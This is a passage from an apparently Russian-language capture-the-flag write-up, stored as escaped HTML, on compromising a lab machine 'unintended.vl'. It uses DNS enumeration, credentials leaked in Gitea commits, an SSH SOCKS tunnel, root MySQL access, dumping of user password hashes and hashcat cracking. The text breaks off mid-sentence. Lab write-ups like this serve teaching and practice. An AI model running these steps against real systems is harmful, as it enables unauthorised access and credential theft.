sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/253\/579\/192\/2535791921410cac6d76053c14115e98.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/253\/579\/192\/2535791921410cac6d76053c14115e98.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u041d\u0430\u0448\u043b\u043e\u0441\u044c \u0434\u0432\u0430 \u0434\u043e\u043c\u0435\u043d\u0430, \u043d\u043e \u0441\u0434\u0435\u043b\u0430\u0435\u043c \u0435\u0449\u0451 \u043e\u0434\u0438\u043d \u0442\u0435\u0441\u0442 \u0441 \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u0438\u0435\u043c \u0434\u0440\u0443\u0433\u043e\u0439 \u0443\u0442\u0438\u043b\u0438\u0442\u044b.<\/p>\n<p><strong>dnsenum &#8212;dnsserver 10.13.38.57 &#8212;enum -p 0 -s 0 -f \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt unintended.vl<\/strong><\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/eda\/8bd\/95d\/eda8bd95dcef06afe7826403d778251d.png\" width=\"1104\" height=\"243\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/eda\/8bd\/95d\/eda8bd95dcef06afe7826403d778251d.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/eda\/8bd\/95d\/eda8bd95dcef06afe7826403d778251d.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p><strong>\u0417\u0434\u0435\u0441\u044c \u043d\u0430 \u043c\u043e\u043c\u0435\u043d\u0442 \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u0438\u044f \u0441\u0442\u0430\u0442\u044c\u0438 \u0443 \u043c\u0430\u0448\u0438\u043d\u044b \u0447\u0442\u043e-\u0442\u043e \u0441 \u0434\u043d\u0441 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u043c, \u0445\u043e\u0442\u044f \u043c\u0430\u0441\u0441\u043a\u0430\u043d \u0433\u043e\u0432\u043e\u0440\u0438\u0442, \u0447\u0442\u043e \u043f\u043e\u0440\u0442 \u043e\u0442\u043a\u0440\u044b\u0442. \u0412\u044b\u0432\u043e\u0434 \u0434\u043e\u043b\u0436\u0435\u043d \u0431\u044b\u0442\u044c \u0442\u0430\u043a\u0438\u043c.<\/strong><\/p>\n<p><em>P.S. \u041f\u043e\u0437\u0436\u0435 \u044f \u0440\u0430\u0437\u043e\u0431\u0440\u0430\u043b\u0441\u044f, \u0434\u0435\u043b\u043e \u0431\u044b\u043b\u043e \u0432 \u043c\u043e\u0435\u043c \u0444\u0430\u0435\u0440\u0432\u043e\u043b\u0435, \u043e\u043d \u043f\u043e\u0447\u0435\u043c\u0443-\u0442\u043e \u043d\u0430\u0447\u0430\u043b \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u0442\u044c <\/em><strong><em>53 <\/em><\/strong><em>\u043f\u043e\u0440\u0442.<\/em><\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/28e\/26d\/f4d\/28e26df4d648b80261ed888b5a4c2457.png\" width=\"561\" height=\"313\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/28e\/26d\/f4d\/28e26df4d648b80261ed888b5a4c2457.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/28e\/26d\/f4d\/28e26df4d648b80261ed888b5a4c2457.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u041f\u0440\u043e\u043f\u0438\u0448\u0435\u043c \u043d\u043e\u0432\u044b\u0435 \u043f\u043e\u0434\u0434\u043e\u043c\u0435\u043d\u044b \u0432 \u0444\u0430\u0439\u043b <strong>hosts<\/strong>.<\/p>\n<p><strong>sudo nano \/etc\/hosts<\/strong><\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/1d1\/4a6\/3da\/1d14a63da9ebe546b69bd64c7752e511.png\" width=\"576\" height=\"148\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/1d1\/4a6\/3da\/1d14a63da9ebe546b69bd64c7752e511.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/1d1\/4a6\/3da\/1d14a63da9ebe546b69bd64c7752e511.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u041f\u0435\u0440\u0435\u0439\u0434\u044f \u043f\u043e \u0430\u0434\u0440\u0435\u0441\u0443 \u043d\u0430\u0441 \u0432\u0441\u0442\u0440\u0435\u0447\u0430\u0435\u0442 <strong>Gitea<\/strong>: <strong>Git with a cup of tea<\/strong>.<\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/9fa\/ec4\/88f\/9faec488f5467c14a2e76eafa2ac0279.png\" width=\"1151\" height=\"647\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/9fa\/ec4\/88f\/9faec488f5467c14a2e76eafa2ac0279.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/9fa\/ec4\/88f\/9faec488f5467c14a2e76eafa2ac0279.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u041f\u0435\u0440\u0435\u0439\u0434\u044f \u0432 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0438, \u0432\u0438\u0434\u0438\u043c, \u0447\u0442\u043e <strong>\u0425\u0443\u0430\u043d<\/strong> \u0438\u043c\u0435\u0435\u0442 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u0439 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0439.<\/p>\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/e21\/4a4\/206\/e214a42067d8451c7fe9e2e4b8167fde.png\" width=\"482\" height=\"95\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/e21\/4a4\/206\/e214a42067d8451c7fe9e2e4b8167fde.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/e21\/4a4\/206\/e214a42067d8451c7fe9e2e4b8167fde.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p> \u0422\u0430\u043a\u0436\u0435 \u0432\u0438\u0434\u0438\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439.<\/p>\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/23f\/265\/a13\/23f265a135daf398a1a977f059f49d4d.png\" width=\"267\" height=\"149\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/23f\/265\/a13\/23f265a135daf398a1a977f059f49d4d.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/23f\/265\/a13\/23f265a135daf398a1a977f059f49d4d.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u041f\u043e\u0445\u043e\u0434\u0438\u043c \u043f\u043e \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u044f\u043c \u0438 \u043d\u0430\u0445\u043e\u0434\u0438\u043c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0435 \u043a\u043e\u043c\u043c\u0438\u0442\u044b.<\/p>\n<p><a href=\"http:\/\/code.unintended.vl\/juan\/DevOps\/commit\/7c54501b040a15a0e57beade1c8910609ec7c785\" rel=\"noopener noreferrer nofollow\">http:\/\/code.unintended.vl\/juan\/DevOps\/commit\/7c54501b040a15a0e57beade1c8910609ec7c785<\/a><\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/061\/6b7\/f06\/0616b7f06a8af4bc26834ee374fe86a3.png\" width=\"895\" height=\"194\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/061\/6b7\/f06\/0616b7f06a8af4bc26834ee374fe86a3.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/061\/6b7\/f06\/0616b7f06a8af4bc26834ee374fe86a3.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p> <a href=\"http:\/\/code.unintended.vl\/juan\/DevOps\/commit\/75f1f713696016f7713e33f836b05ce14784fc22\" rel=\"noopener noreferrer nofollow\">http:\/\/code.unintended.vl\/juan\/DevOps\/commit\/75f1f713696016f7713e33f836b05ce14784fc22<\/a><\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/000\/edb\/df7\/000edbdf77dd19c62f31d871dd78f2fe.png\" width=\"904\" height=\"288\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/000\/edb\/df7\/000edbdf77dd19c62f31d871dd78f2fe.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/000\/edb\/df7\/000edbdf77dd19c62f31d871dd78f2fe.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u041f\u043e\u043f\u0440\u043e\u0431\u0443\u0435\u043c \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0438\u0442\u044c\u0441\u044f \u0441 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u044b\u043c \u0443\u0447\u0435\u0442\u043d\u044b\u043c\u0438 \u0434\u0430\u043d\u043d\u044b\u043c\u0438 \u043a <strong>ssh<\/strong>.<\/p>\n<p><strong>ssh ftp_user@web.unintended.vl<\/strong><\/p>\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/080\/a54\/b73\/080a54b737e5482b8433bfed51cc314e.png\" width=\"334\" height=\"80\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/080\/a54\/b73\/080a54b737e5482b8433bfed51cc314e.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/080\/a54\/b73\/080a54b737e5482b8433bfed51cc314e.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u041d\u0430\u043c \u0434\u0430\u044e\u0442 \u043f\u043e\u0434\u0441\u043a\u0430\u0437\u043a\u0443 &#8212; <strong>This service allows sftp connections only<\/strong>.<\/p>\n<p>\u041f\u043e\u0434\u043a\u043b\u044e\u0447\u0438\u043c\u0441\u044f \u043f\u043e <strong>sftp<\/strong> \u043a\u0430\u043a \u043d\u0430\u043c \u0441\u043e\u0432\u0435\u0442\u0443\u044e\u0442.<\/p>\n<p><strong>sftp ftp_user@web.unintended.vl<\/strong><\/p>\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/83b\/219\/a80\/83b219a8008fb160a1bb8490c1c4da2d.png\" width=\"333\" height=\"64\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/83b\/219\/a80\/83b219a8008fb160a1bb8490c1c4da2d.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/83b\/219\/a80\/83b219a8008fb160a1bb8490c1c4da2d.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u041d\u043e \u043d\u0430 <strong>ftp<\/strong> \u043d\u0438\u0447\u0435\u0433\u043e \u043d\u0435 \u043d\u0430\u0445\u043e\u0434\u0438\u043c.<\/p>\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/9d3\/1ab\/8f8\/9d31ab8f83515de4ebc64c067fada7bf.png\" width=\"484\" height=\"124\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/9d3\/1ab\/8f8\/9d31ab8f83515de4ebc64c067fada7bf.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/9d3\/1ab\/8f8\/9d31ab8f83515de4ebc64c067fada7bf.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u0421\u043e\u0433\u043b\u0430\u0441\u043d\u043e \u0440\u0430\u0437\u0434\u0435\u043b\u0443 \u043d\u0430 <strong>HackTricks<\/strong>, \u0441\u043b\u0443\u0436\u0431\u0430 <strong>SFTP<\/strong> \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u043d\u0435\u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e \u043d\u0430\u0441\u0442\u0440\u043e\u0435\u043d\u0430, \u0440\u0430\u0437\u0440\u0435\u0448\u0430\u044f \u043f\u0435\u0440\u0435\u0430\u0434\u0440\u0435\u0441\u0430\u0446\u0438\u044e \u043f\u043e\u0440\u0442\u043e\u0432 \u0438 \u0442\u0443\u043d\u043d\u0435\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435, \u0434\u0430\u0436\u0435 \u0435\u0441\u043b\u0438 \u043e\u043d\u0430 \u0437\u0430\u043f\u0440\u0435\u0449\u0430\u0435\u0442 \u0432\u0445\u043e\u0434 \u043f\u043e <strong>SSH<\/strong>, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0430\u043c \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u044c \u0438 \u043f\u043e\u043b\u0443\u0447\u0430\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0438\u043c \u043f\u043e\u0440\u0442\u0430\u043c \u0438 \u0441\u0435\u0442\u044f\u043c.<\/p>\n<p>\u0414\u0430\u0432\u0430\u0439\u0442\u0435 \u043d\u0430\u0441\u0442\u0440\u043e\u0438\u043c <strong>SOCKS<\/strong>-\u043f\u0440\u043e\u043a\u0441\u0438:<\/p>\n<p><strong>ssh -D 1080 -N <\/strong><a href=\"mailto:ftp_user@web.unintended.vl\" rel=\"noopener noreferrer nofollow\"><strong>ftp_user@web.unintended.vl<\/strong><\/a><\/p>\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/2d5\/632\/61d\/2d563261d38c30eaefaadd81a301375e.png\" width=\"391\" height=\"71\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/2d5\/632\/61d\/2d563261d38c30eaefaadd81a301375e.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/2d5\/632\/61d\/2d563261d38c30eaefaadd81a301375e.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u041f\u043e\u043f\u0440\u0430\u0432\u0438\u043c \u043a\u043e\u043d\u0444\u0438\u0433 <strong>proxychains4<\/strong>.<\/p>\n<p><strong>sudo nano \/etc\/proxychains4.conf<\/strong><\/p>\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/3f4\/9d0\/02e\/3f49d002e3b843bf063aa21791a1335d.png\" width=\"206\" height=\"86\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/3f4\/9d0\/02e\/3f49d002e3b843bf063aa21791a1335d.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/3f4\/9d0\/02e\/3f49d002e3b843bf063aa21791a1335d.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u0422\u0435\u043f\u0435\u0440\u044c \u043c\u043e\u0436\u0435\u043c \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u044c <strong>nmap<\/strong> \u0447\u0435\u0440\u0435\u0437 \u043f\u0440\u043e\u043a\u0441\u0438 \u0438 \u043f\u0440\u043e\u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u043f\u043e\u0440\u0442\u044b.<\/p>\n<p><strong>sudo proxychains4 nmap -sT -Pn 127.0.0.1<\/strong><\/p>\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/84e\/886\/515\/84e886515b32d1d92a5bd15c1b1b421b.png\" width=\"514\" height=\"216\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/84e\/886\/515\/84e886515b32d1d92a5bd15c1b1b421b.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/84e\/886\/515\/84e886515b32d1d92a5bd15c1b1b421b.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u041d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u043e\u0442\u043a\u0440\u044b\u0442 \u043f\u043e\u0440\u0442 <strong>mysql<\/strong> \u2013 <strong>3306<\/strong>.<\/p>\n<p>\u041f\u043e\u0434\u043a\u043b\u044e\u0447\u0438\u043c\u0441\u044f \u043a \u0441\u0435\u0440\u0432\u0435\u0440\u0443 \u0431\u0430\u0437\u044b \u0434\u0430\u043d\u043d\u044b\u0445.<\/p>\n<p><strong>sudo proxychains4 mysql -h 127.0.0.1 -u root -p<\/strong><\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/555\/e3f\/def\/555e3fdef64c718bb402d3b189a4b23a.png\" width=\"646\" height=\"228\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/555\/e3f\/def\/555e3fdef64c718bb402d3b189a4b23a.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/555\/e3f\/def\/555e3fdef64c718bb402d3b189a4b23a.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u041f\u043e\u0441\u043c\u043e\u0442\u0440\u0438\u043c \u0431\u0430\u0437\u044b \u0434\u0430\u043d\u043d\u044b\u0445.<\/p>\n<p><strong>show databases;<\/strong><\/p>\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/141\/2fb\/8f2\/1412fb8f2298ed609cf1f85c1eb2be13.png\" width=\"264\" height=\"179\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/141\/2fb\/8f2\/1412fb8f2298ed609cf1f85c1eb2be13.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/141\/2fb\/8f2\/1412fb8f2298ed609cf1f85c1eb2be13.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u041d\u0430\u0441 \u0431\u0443\u0434\u0435\u0442 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043e\u0432\u0430\u0442\u044c \u0431\u0430\u0437\u0430 \u0434\u0430\u043d\u043d\u044b\u0445 <strong>gitea<\/strong>.<\/p>\n<p>\u041f\u0435\u0440\u0435\u0445\u043e\u0434\u0438\u043c \u0432 \u043d\u0435\u0451.<\/p>\n<p><strong>use gitea;<\/strong><\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/e47\/831\/c8b\/e47831c8b8ebdda003a3000bdd07f624.png\" width=\"541\" height=\"92\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/e47\/831\/c8b\/e47831c8b8ebdda003a3000bdd07f624.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/e47\/831\/c8b\/e47831c8b8ebdda003a3000bdd07f624.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u0418 \u0441\u043c\u043e\u0442\u0440\u0438\u043c \u0442\u0430\u0431\u043b\u0438\u0446\u044b.<\/p>\n<p><strong>show tables;<\/strong><\/p>\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/2e7\/a3f\/fb5\/2e7a3ffb5075b43f5e463af0bcd44d81.png\" width=\"242\" height=\"217\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/2e7\/a3f\/fb5\/2e7a3ffb5075b43f5e463af0bcd44d81.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/2e7\/a3f\/fb5\/2e7a3ffb5075b43f5e463af0bcd44d81.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u041d\u0430\u0441 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u0443\u0435\u0442 \u0442\u0430\u0431\u043b\u0438\u0446\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 <strong>users<\/strong>, \u0438\u0437\u0432\u043b\u0435\u0447\u0435\u043c \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u0438\u0437 \u043d\u0435\u0451.<\/p>\n<p><strong>select email,passwd,passwd_hash_algo,salt,is_admin from user;<\/strong><\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/4ec\/6f1\/cfa\/4ec6f1cfaebf46194a5b7e435b4ed4c6.png\" width=\"1011\" height=\"97\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/4ec\/6f1\/cfa\/4ec6f1cfaebf46194a5b7e435b4ed4c6.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/4ec\/6f1\/cfa\/4ec6f1cfaebf46194a5b7e435b4ed4c6.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u041c\u044b \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u043c \u0441 \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u0435\u043c <strong>pbkdf2$50000<\/strong>, \u0441\u043e \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u044b <strong>hashcat<\/strong> \u043c\u043e\u0436\u043d\u043e \u0443\u0437\u043d\u0430\u0442\u044c \u0440\u0435\u0436\u0438\u043c \u0434\u043b\u044f \u0431\u0440\u0443\u0442\u0444\u043e\u0440\u0441\u0430 \u0438 \u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u044b\u0439 \u0432\u0438\u0434 \u0445\u0435\u0448\u0430.<\/p>\n<p><strong>10900PBKDF2-HMAC-SHA256 sha256:1000:MTc3MTA0MTQwMjQxNzY=:PYjCU215Mi57AYPKva9j7mvF4Rc5bCnt<\/strong><\/p>\n<p>\u041f\u0440\u0435\u043e\u0431\u0440\u0430\u0437\u0443\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u0432 \u043d\u0443\u0436\u043d\u044b\u0439 \u0444\u043e\u0440\u043c\u0430\u0442.<\/p>\n<p>\u0414\u043b\u044f \u043d\u0430\u0447\u0430\u043b\u0430 \u0432\u044b\u043f\u0438\u0448\u0435\u043c \u0445\u0435\u0448 \u0438 \u0441\u043e\u043b\u044c.<\/p>\n<p><strong>\u0445\u0435\u0448<\/strong> &#8212; <strong>f57a3d5d199ac8054c709e665b4eb4842f0e172a253a96038be5ef9e6fe7b0290f2d715524883dd117ac309e878c1dbbe902<\/strong><\/p>\n<p><strong>\u0441\u043e\u043b\u044c<\/strong> \u2014 <strong>6f7cf4aa34feb922092ef9f7ca342fa5<\/strong><\/p>\n<p>\u041f\u0440\u0435\u043e\u0431\u0440\u0430\u0437\u0443\u0435\u043c <strong>\u0441\u043e\u043b\u044c<\/strong> \u0432 <strong>base64<\/strong>.<\/p>\n<p><strong>echo &#8216;6f7cf4aa34feb922092ef9f7ca342fa5&#8217; | xxd -r -p | base64<\/strong><\/p>\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/b10\/3d1\/477\/b103d14779faac8c5308a3c1db2eb79a.png\" width=\"518\" height=\"32\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/b10\/3d1\/477\/b103d14779faac8c5308a3c1db2eb79a.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/b10\/3d1\/477\/b103d14779faac8c5308a3c1db2eb79a.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u041f\u0440\u0435\u043e\u0431\u0440\u0430\u0437\u0443\u0435\u043c <strong>\u0445\u0435\u0448<\/strong> \u0432 <strong>base64<\/strong>.<\/p>\n<p><strong>echo &#8216;f57a3d5d199ac8054c709e665b4eb4842f0e172a253a96038be5ef9e6fe7b0290f2d715524883dd117ac309e878c1dbbe902&#8217; | xxd -r -p | base64<\/strong><\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/dfa\/1ee\/9c9\/dfa1ee9c9c92a1db1aa9831997003ccd.png\" width=\"1068\" height=\"52\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/dfa\/1ee\/9c9\/dfa1ee9c9c92a1db1aa9831997003ccd.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/dfa\/1ee\/9c9\/dfa1ee9c9c92a1db1aa9831997003ccd.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u0421\u043e\u0437\u0434\u0430\u0434\u0438\u043c \u0444\u0430\u0439\u043b \u0434\u043b\u044f \u0431\u0440\u0443\u0442\u0430.<\/p>\n<p><strong>sudo nano administrator.gitea.hash<\/strong><\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/b3d\/a4c\/3ed\/b3da4c3edd8020ea22cb90ce99120b36.png\" width=\"862\" height=\"50\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/b3d\/a4c\/3ed\/b3da4c3edd8020ea22cb90ce99120b36.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/b3d\/a4c\/3ed\/b3da4c3edd8020ea22cb90ce99120b36.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u0418 \u0431\u0440\u0443\u0442\u0438\u043c \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c <strong>hashcat<\/strong>.<\/p>\n<p><strong>hashcat  -m10900 administrator.gitea.hash rockyou.txt<\/strong><\/p>\n<figure class=\"full-width \"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/f36\/235\/22e\/f3623522ed89b0ace287a92baf6cf660.png\" width=\"950\" height=\"45\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/f36\/235\/22e\/f3623522ed89b0ace287a92baf6cf660.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/f36\/235\/22e\/f3623522ed89b0ace287a92baf6cf660.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/figure>\n<p>\u041f\u0430\u0440\u043e\u043b\u044c 